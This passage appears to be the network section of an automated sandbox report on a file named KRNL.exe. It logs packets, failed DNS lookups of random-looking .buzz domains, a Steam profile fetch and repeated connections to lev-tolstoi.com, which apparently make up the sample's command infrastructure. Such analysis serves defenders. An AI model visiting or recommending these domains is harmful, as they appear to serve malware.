                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983817101 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048425913 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048460960 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048566103 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048815966 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048830986 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.506642103 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.506865025 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.512383938 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.512398958 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.512717009 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.513885975 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.514004946 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.514031887 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290113926 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290273905 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290332079 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290415049 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290426016 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455018044 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455080032 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455173016 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455537081 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455555916 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.927046061 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.927120924 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.928328991 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.928338051 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.928538084 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.929630995 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.929799080 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.929831028 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.929917097 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.929934025 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.532097101 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.532187939 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.532229900 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.532313108 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.532322884 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.904607058 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.904660940 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.904731989 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.905520916 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:05.905533075 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.365614891 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.365716934 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.367098093 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.367110014 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.367319107 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.368621111 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.368722916 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:06.368729115 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.104801893 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.104923964 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.104988098 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.105144024 CET49739443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.105165005 CET44349739172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.597620010 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.597665071 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.597737074 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.598050117 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:07.598061085 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.096951962 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.097129107 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.098181963 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.098192930 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.098408937 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.109431982 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110239983 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110275030 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110394955 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110426903 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110737085 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110780954 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110935926 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.110971928 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111166954 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111197948 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111407042 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111432076 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111439943 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111454010 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111660004 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111684084 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111709118 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111886024 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.111903906 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.120351076 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.120634079 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.120660067 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.120682001 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.120718956 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.120743036 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:08.125196934 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.796082973 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.796179056 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.796253920 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.796478033 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.796490908 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.832335949 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.832432985 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.832540989 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.832801104 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:12.832838058 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.289324999 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.289406061 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.290544987 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.290550947 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.290746927 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.291914940 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.291929960 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.291970968 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765456915 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765508890 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765542030 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765564919 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765574932 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765614986 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765615940 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765624046 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765675068 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765680075 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765728951 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765769005 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.765774965 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766079903 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766122103 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766128063 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766496897 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766541958 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766546965 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766561031 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766603947 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766668081 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766675949 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766700029 CET49741443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:13.766704082 CET44349741172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.159807920 CET5488653192.168.2.4162.159.36.2
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.164629936 CET5354886162.159.36.2192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.164712906 CET5488653192.168.2.4162.159.36.2
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.169473886 CET5354886162.159.36.2192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.641139984 CET5488653192.168.2.4162.159.36.2
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.646152973 CET5354886162.159.36.2192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.646203995 CET5488653192.168.2.4162.159.36.2

                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.265379906 CET6388253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.274060965 CET53638821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.277209997 CET6522153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.285598993 CET53652211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.287509918 CET5931753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.296370029 CET53593171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.298392057 CET5360153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.307514906 CET53536011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.309461117 CET5697253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.317655087 CET53569721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.319722891 CET5301753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.335031033 CET53530171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.336400032 CET6543253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.345901966 CET53654321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.358475924 CET5831253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.368380070 CET53583121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.370471954 CET5935253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.379169941 CET53593521.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.381047964 CET6135753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.389082909 CET53613571.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.665224075 CET6090553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.677926064 CET53609051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.159352064 CET5356712162.159.36.2192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.808635950 CET5410953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.816570044 CET53541091.1.1.1192.168.2.4

                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.265379906 CET192.168.2.41.1.1.10x98a8Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.277209997 CET192.168.2.41.1.1.10x9672Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.287509918 CET192.168.2.41.1.1.10x3caStandard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.298392057 CET192.168.2.41.1.1.10xf5c2Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.309461117 CET192.168.2.41.1.1.10x1d70Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.319722891 CET192.168.2.41.1.1.10xec7Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.336400032 CET192.168.2.41.1.1.10x80fStandard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.358475924 CET192.168.2.41.1.1.10x7f5fStandard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.370471954 CET192.168.2.41.1.1.10xe2beStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.381047964 CET192.168.2.41.1.1.10x1262Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.665224075 CET192.168.2.41.1.1.10x42deStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.808635950 CET192.168.2.41.1.1.10x93c0Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.274060965 CET1.1.1.1192.168.2.40x98a8Name error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.285598993 CET1.1.1.1192.168.2.40x9672Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.296370029 CET1.1.1.1192.168.2.40x3caName error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.307514906 CET1.1.1.1192.168.2.40xf5c2Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.317655087 CET1.1.1.1192.168.2.40x1d70Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.335031033 CET1.1.1.1192.168.2.40xec7Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.345901966 CET1.1.1.1192.168.2.40x80fName error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.368380070 CET1.1.1.1192.168.2.40x7f5fName error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.379169941 CET1.1.1.1192.168.2.40xe2beName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.389082909 CET1.1.1.1192.168.2.40x1262No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.677926064 CET1.1.1.1192.168.2.40x42deNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.677926064 CET1.1.1.1192.168.2.40x42deNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:30.816570044 CET1.1.1.1192.168.2.40x93c0Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                        • lev-tolstoi.com

                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.449733104.102.49.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:27:59 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                        2025-01-01 20:27:59 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:27:59 GMT
                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: sessionid=eb57dd49dd895c3631208604; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                        2025-01-01 20:27:59 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                        2025-01-01 20:27:59 UTC16384INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
